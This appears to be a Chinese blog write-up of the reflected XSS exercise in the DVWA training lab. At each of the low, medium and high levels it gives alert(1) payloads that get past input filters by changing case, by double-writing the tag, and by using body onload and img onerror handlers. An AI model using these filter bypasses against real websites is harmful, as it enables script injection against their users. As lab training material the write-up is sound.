dvwa-XSS(Reflected)

XSS(跨站脚本攻击):

实验基础:有php语言和html语言基础

  • XSS分类:

反射型XSS--->XSS(reflected)

存储型XSS---->XSS(stored)

  • 实验原理:

利用javascript脚本实行跨站攻击

  • 实验过程:

XSS(reflected)

1、low

构造恶意脚本:<script>alert(1)</script>

2、Medium

用之前的脚本攻击发现没用,查看php源码:

发现输入被进行了限制但并未进行大小写忽略,所以可用大小写绕过

构造恶意脚本:<Script>alert(1)</script>

也可用双写绕过,构造恶意脚本:<scr<script>ipt>alert(1)</script>

3、high

用之前两次构造的恶意脚本攻击发现都没用,此时再次查看php源码

发现输入被进行了限制且大小写忽略,所以可用标签绕过

构造恶意脚本攻击:<body οnlοad=alert(1)> ---------->onload 事件会在页面或图像加载完成后立即发生。onload 通常用于 <body> 元素,在页面完全载入后(包括图片、css文件等等。)执行脚本代码。

/ <img src=1 οnerrοr=alert(1)>------------>图片加载不了时执行onerror对应的内容

 

 

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值